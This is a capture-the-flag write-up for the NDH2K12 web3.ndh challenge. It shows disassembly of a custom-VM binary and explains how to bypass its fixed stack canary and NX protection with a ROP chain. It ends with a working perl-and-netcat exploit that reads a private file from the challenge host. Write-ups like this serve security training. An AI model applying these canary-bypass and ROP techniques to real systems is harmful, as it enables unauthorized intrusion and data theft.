NDH2K12 Prequals: web3.ndh writeup (port 4005)
From: Piotr <piotr@megacortek.com>
To: LSE <lse@megacortek.com>
Subject: Another weird link
Attachments : web3.ndh
Thank you again for these informations! we have just credited your account
with $1700. Our spy thinks that Sciteek staff is aware about the mole
inside their building. He is trying to read a private file named
"sciteek-private.txt" located at sciteek.nuitduhack.com:4005. Please find
the .ndh attached, if you are sucessfull, reply with a message entitled
"complex remote service".
Of course, your efforts will be rewarded with $2500. Maybe you will find
pieces of informations about the mole.
Piotr
As before, we can easily execute this .ndh file in the VM we have to understand the behavior of the program, but this time we also had an IDA plugin to help us.
Program will reserve 0x200 bytes for the receveid buffer, and setup a canary
on the stack at offset 0x200 avoiding stack based buffer overflow. But the
canary is always the same value 0xbeef, this protection will be easy to
bypass.
An another protection has been setup on this challenge, NX byte, instead of service 4004, we won’t be able to execute code from our buffer. We will use ROP technics, to bypass it.
We figured out an excellent sub function (like in service 4000) “disp_file_content”.
ROM:8201 disp_file_content:
ROM:8201 PUSH R1
ROM:8204 PUSH R2
ROM:8207 PUSH R3
ROM:820A PUSH R4
ROM:820D PUSH R5
ROM:8210 MOVL R1, 0
ROM:8215 CALL SYSCALL_OPEN
ROM:8219 CMPL R0, $FFFF
ROM:821E JNZ file_valid
ROM:8221 XOR R0, R0
ROM:8225 POP R5
ROM:8227 POP R4
ROM:8229 POP R3
ROM:822B POP R2
ROM:822D POP R1
ROM:822F RET
ROM:8230 ; ---------------------------------------------------------------------------
ROM:8230
ROM:8230 file_valid: ; CODE XREF: disp_file_content+1D
ROM:8230 MOV R3, R0
ROM:8234 MOVL R1, 0
ROM:8239 MOVL R2, $2
ROM:823E CALL SYSCALL_FSEEK
ROM:8242 MOV R4, R0
ROM:8246 INC R4
ROM:8248 MOV R0, R3
ROM:824C MOVL R1, 0
ROM:8251 MOVL R2, 0
ROM:8256 CALL SYSCALL_FSEEK
ROM:825A SUB SP, R4
ROM:825E MOV R5, SP
ROM:8262 MOV R0, R3
ROM:8266 MOV R1, SP
ROM:826A MOV R2, R4
ROM:826E CALL SYSCALL_READ
ROM:8272 ADD R4, R5
ROM:8276 DEC R4
ROM:8278 MOVBT R4, 0
ROM:827C MOV R0, R5
ROM:8280 CALL write_socket
ROM:8284 MOVB R0, 1
ROM:8288 INC R4
ROM:828A SUB R4, R5
ROM:828E ADD SP, R4
ROM:8292 POP R5
ROM:8294 POP R4
ROM:8296 POP R3
ROM:8298 POP R2
ROM:829A POP R1
ROM:829C RET
ROM:829C ; End of function disp_file_content
Before calling this function we have to set R0 correctly to the file required file name (“sciteek-private.txt”).
We will use these simple gadgets to change the value of R0 and quit program
correctly:
ROM:80BD POP R0
ROM:80BF RET
[...]
ROM:838C END
Scheme of exploitation looks like:
[file_name] [NULL_PADDING] [POP_R0;RET] [ADDR_BUFF] [disp_file_content] [END]
Here is the final exploit :
perl -e 'print "sciteek-private.txt" . "\x00"x493 . "\xef\xbe" . "\xbd\x80" . "\xf4\x7b" . "\x01\x82" . "\x8c\x83"' | nc sciteek.nuitduhack.com 4005
Dear Patrick,
We found many evidences proving there is a mole inside our company who is selling confidential materials to our main competitor, Megacortek. We have very good reasons to believe that Walter Smith have sent some emails to a contact at Megacortek, containing confidential information.
However, these emails seems to have been encrypted and sometimes contain images or audio files which are apparently not related with our company or our business
, but one of them contains an archive with an explicit name.
We cannot stand this situation anymore, and we should take actions to make Mr Smith leave the company: we can fire this guy or why not call the FBI to handle this case as it should be.
Sincerely,
David Markham.